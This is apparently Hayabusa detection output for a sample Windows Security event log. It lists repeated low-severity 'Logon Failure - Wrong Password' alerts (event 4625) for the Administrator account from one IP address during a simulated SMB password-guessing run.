2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
